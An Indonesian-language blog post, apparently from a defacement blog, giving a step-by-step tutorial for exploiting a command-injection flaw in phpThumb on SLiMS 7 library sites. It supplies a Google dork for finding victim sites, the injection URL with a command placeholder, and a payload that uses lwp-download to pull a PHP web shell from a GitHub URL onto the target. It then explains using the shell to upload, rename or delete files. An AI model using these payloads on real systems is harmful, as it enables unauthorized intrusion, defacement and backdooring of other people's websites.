Slims7 phpThumb Command Injection


Hallo, 
Kembali lagi di Evil Twin - Blog, Oke pada artikel kali ini Admin ingin memberikan sebuah Tutorial Deface lagi, yaitu Exploit POC Slims7 phpThumb Command Injection.

Artikel ini dibuat karena banyaknya Defacer yang Show Off menggunakan POC (Proof of Concept) ini, Jadi Admin penasaran dengan POC yang dulu pernah booming beberapa tahun lalu ini.

Oke langsung aja ke tutorialnya, Tanpa berlama-lama lagi, hehe.

Mencari Target

Seperti biasa, Tahap awal untuk melakukan Deface ini harus mencari target terlebih dahulu. Kalian bisa menggunakan Google dork dibawah ini untuk mencarinya.

DORK:
intext:"Powered By Slims"
Note : Dikembangin lagi ya dorknya, biar dapat banyak website yang fresh, hehe.

Dan untuk Exploitnya adalah sebagai berikut.

EXPLOIT:
/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;[COMMAND];&phpThumbDebug=9
Note : [COMMAND] Di isi perintah dalam terminal seperti dir, ls dan lain-lain.

Ciri-Ciri Target Vuln

Versi phpThumb yang vuln adalah v1.7xxx, Admin kurang tau versi yang diatas itu vuln atau enggak (Tapi coba aja dulu), Untuk ciri-ciri vuln nya adalah command yang kita masukkan berhasil ter-eksekusi.


Pada saat Admin memasukkan command ls;echo https://blog.eviltwin.id, Command tersebut berhasil ter-eksekusi dan outputnya bisa dilihat gambar diatas.

Upload Shell

Jika sudah mendapatkan target yang vuln maka selanjutnya tinggal mengupload shell backdoornya saja, Command untuk mengupload shellnya adalah sebagai berikut:
/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;lwp-download%20https://raw.githubusercontent.com/eviltwin-dev/eviltwin-shell/master/shell.php;%20&phpThumbDebug=9
Simpel nya sih command seperti ls etc di ganti menjadi lwp-download linkshell atau bisa juga menggunakan wget, curl (Tapi tadi pas Admin coba pake wget eh malah 406 Not acceptable)


Setelah Admin masukkan command untuk melihat list file dan dir, Ada file shell.php yang tadi kita Download menggunakan command diatas, Itu artinya berhasil. Tinggal akses aja deh shellnya.


Yapss, Shell berhasil di akses. Sekarang bebas deh mau ngapain aja (Upload, rename, delete etc) asal Permissionnya Writable.

Akhir Kata

Oke mungkin cukup sampai disini aja artikel tentang "Exploit POC Slims7 phpThumb Command Injection".
Mohon maaf bila ada kesalahan kata dan sebagainya, Mohon dimaklumi karena Admin juga masih dalam tahap belajar.

Semoga bermanfaat dan Sampai jumpa di Artikel selanjutnya!